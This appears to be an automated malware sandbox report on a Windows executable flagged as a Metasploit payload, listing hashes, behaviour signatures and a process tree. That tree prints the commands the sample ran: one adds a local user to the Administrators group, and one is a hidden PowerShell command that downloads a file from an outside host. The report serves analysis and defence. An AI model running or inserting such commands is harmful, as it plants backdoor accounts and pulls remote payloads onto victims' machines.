Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
01-06-2024 18:53
Behavioral task
behavioral1
Sample
sample1.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
sample1.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
sample2.exe_
Resource
ubuntu2204-amd64-20240522.1-en
General
-
Target
sample1.exe
-
Size
83KB
-
MD5
dec37e4b834cf3a9a78475fec06255db
-
SHA1
bc6a9f3dd99e40dfe34ba8c64401027a3d86d2bc
-
SHA256
075a8576bb2f75bf56cfa8c88727011ac66f176ca5abe2a78978c556577e5058
-
SHA512
8402a9206285014fe6ab3752433835a7f907406d2c5fb23204a567d3f9940c844578ee525c64b6a67d81bf0983e7d3972fb2380d822cc9fd08eec098749d4a77
-
SSDEEP
1536:Icus7AQXjNta73Jah9UFBD3JMb+KR0Nc8QsJq3Gnq3+/q3DlHq3/:lAYhta7ouJe0Nc8QsCzDDm/
Malware Config
Extracted
http://web.danger.mal/danger
Extracted
metasploit
windows/exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
sample1.exedescription pid process target process PID 2620 wrote to memory of 2132 2620 sample1.exe powershell.exe PID 2620 wrote to memory of 2132 2620 sample1.exe powershell.exe PID 2620 wrote to memory of 2132 2620 sample1.exe powershell.exe PID 2620 wrote to memory of 2132 2620 sample1.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample1.exe"C:\Users\Admin\AppData\Local\Temp\sample1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user TestUser S3cret^S3cret /ADD && net localgroup Administrators TestUser /ADD2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy bypass -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('http://web.danger.mal/danger','C:/danger')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2132-4-0x00000000741F1000-0x00000000741F2000-memory.dmpFilesize
4KB
-
memory/2132-5-0x00000000741F0000-0x000000007479B000-memory.dmpFilesize
5.7MB
-
memory/2132-6-0x00000000741F0000-0x000000007479B000-memory.dmpFilesize
5.7MB
-
memory/2132-7-0x00000000741F0000-0x000000007479B000-memory.dmpFilesize
5.7MB
-
memory/2132-8-0x00000000741F0000-0x000000007479B000-memory.dmpFilesize
5.7MB
-
memory/2132-9-0x00000000741F0000-0x000000007479B000-memory.dmpFilesize
5.7MB
-
memory/2620-0-0x0000000000400000-0x000000000041B1FC-memory.dmpFilesize
108KB
-
memory/2620-1-0x0000000000020000-0x0000000000021000-memory.dmpFilesize
4KB